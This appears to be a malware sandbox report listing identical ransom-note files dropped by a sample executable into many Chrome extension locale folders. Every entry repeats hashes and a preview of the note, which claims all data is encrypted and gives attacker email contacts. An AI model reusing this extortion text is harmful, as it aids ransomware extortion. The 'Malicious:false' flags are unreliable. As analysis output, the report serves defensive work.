                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_GB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_US\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\eu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fil\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\he\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
